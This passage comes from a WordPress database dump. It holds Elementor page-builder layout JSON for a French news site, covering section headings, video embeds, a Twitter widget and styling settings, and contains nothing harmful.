settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yv512dr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"r0msrm9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6sjgmnp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"count\":\"on\"}},\"elements\":[],\"widgetType\":\"wp-widget-categories\"}],\"isInner\":false},{\"id\":\"5f992be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"qv96y21\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"qt5cd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1520,512,'_elementor_version','0.4'),(1521,512,'_elementor_css','a:3:{s:4:\"time\";i:1508932053;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1522,513,'_elementor_edit_mode','builder'),(1523,513,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yv512dr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"r0msrm9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6sjgmnp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"count\":\"on\"},\"_background_background\":\"gradient\"},\"elements\":[],\"widgetType\":\"wp-widget-categories\"}],\"isInner\":false},{\"id\":\"5f992be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"554mv8a\",\"elType\":\"widget\"